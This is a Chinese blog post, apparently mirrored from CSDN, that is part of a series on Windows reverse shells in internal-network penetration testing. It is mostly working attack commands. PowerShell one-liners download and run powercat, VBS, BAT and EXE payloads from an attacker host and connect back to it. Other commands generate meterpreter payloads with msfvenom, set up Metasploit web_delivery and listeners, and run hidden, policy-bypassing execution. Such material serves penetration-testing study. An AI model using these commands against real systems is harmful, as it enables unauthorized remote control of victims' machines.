码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 内网渗透之Windows反弹shell(三)


    目录

    Windows反弹shell

    06Powershell.exe

    通过PowerShell发起Powercat攻击

    通过Web Delivery反弹shell

    通过powershell启动cscript.exe

    通过powershell启动bat文件

    通过powershell启动exe文件

    内网渗透之Windows反弹shell(四)_不知名白帽的博客-CSDN博客


    Windows反弹shell

    06Powershell.exe

    你可以使用命令行选项从另一个工具的命令行运行PowerShell,或者PowerShell命令行中使用它来启动新会话

    通过PowerShell发起Powercat攻击

    通过PowerShell本地后门额监听器和反向shell工具·也成为修改版本的netcat`因为它继承支持经过编码的有效载荷

    开启http服务,用于远程加载powercat文件

    python3 -m http.server

    控制端监听端口

    nc -lvvp 7777

    被控制端执行,转发cmd命令到7777端口

     powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.121:8000/powercat.ps1');powercat -c 192.168.1.121 -p 7777 -e cmd"

    反弹成功

    通过Web Delivery反弹shell

    use exploit/multi/script/web_delivery

    set target 2

    set payload windows/x64/meterpreter/reverse_tcp

    set lhost 192.168.1.121

    set lport 4444

    exploit -j

     

    被控端执行

    反弹shell

    通过powershell启动cscript.exe

    powershell允许客户端通过执行cscript.exe来运行wsf、js、vbscript脚本。

    生成恶意文件

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=8888 -f vbs -o 8888.vbs

    开启http服务

    开启handler监听

    handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.121 -P 8888

    被控端执行

    powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.121:8000/8888.vbs','C:\Users\Administrator\Desktop\8888.vbs');Start-Process C:\Windows\System32\cscript.exe C:\Users\Administrator\Desktop\8888.vbs"

    桌面生成8888.vbs文件,打开cscript.exe并运行8888.vbs文件

    反弹成功

    通过powershell启动bat文件

    powershell允许客户端执行bat文件

    通过msfvenom生成bat恶意文件

    msfvenom -p cmd/windows/powershell_reverse_tcp lhost=192.168.1.121 lport=9999 -o 9999.bat

    msf开启监听,然后开启http服务用于被控制端下载恶意文件

    python3 -m http.server

    handler -p cmd/windows/powershell_reverse_tcp -H 192.168.1.121 -P 9999

    被控制端执行恶意文件

    powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.121:8000/9999.bat')"

    反弹成功

    通过powershell启动exe文件

    msfvenom生成恶意文件

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=3333 -f exe -o 3333.exe

    开启http服务

    msf开启监听

    handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.121 -P 3333

    执行恶意文件

    powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.121:8000/3333.exe','1.exe');start 1.exe

    powershell -ep bypass -nop -w hidden (new-object

    system.net.webclient).downloadfile('http://192.168.1.121:8000/3333.exe','1.exe');start-process 1.exe

    反弹成功

  • 相关阅读:
    一文总结提示工程框架,除了CoT还有ToT、GoT、AoT、SoT、PoT
    向NS-3添加新模块_ns3.37添加新模块_ns3.37不同版本模块移植
    如何组装一个注册中心
    HTML5期末大作业:HTML+CSS茶叶官网网页设计实例 企业网站制作
    Unity3D赛车游戏+脚本基础
    Photoshop图层混合模式公式(Unity,CG实现)
    java计算机毕业设计冠军体育用品购物网站MyBatis+系统+LW文档+源码+调试部署
    NSSCTF Round#4
    企业工程项目管理系统源码(三控:进度组织、质量安全、预算资金成本、二平台:招采、设计管理)
    客观题【笔试】
  • 原文地址:https://blog.csdn.net/lyshark_lyshark/article/details/126799206
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号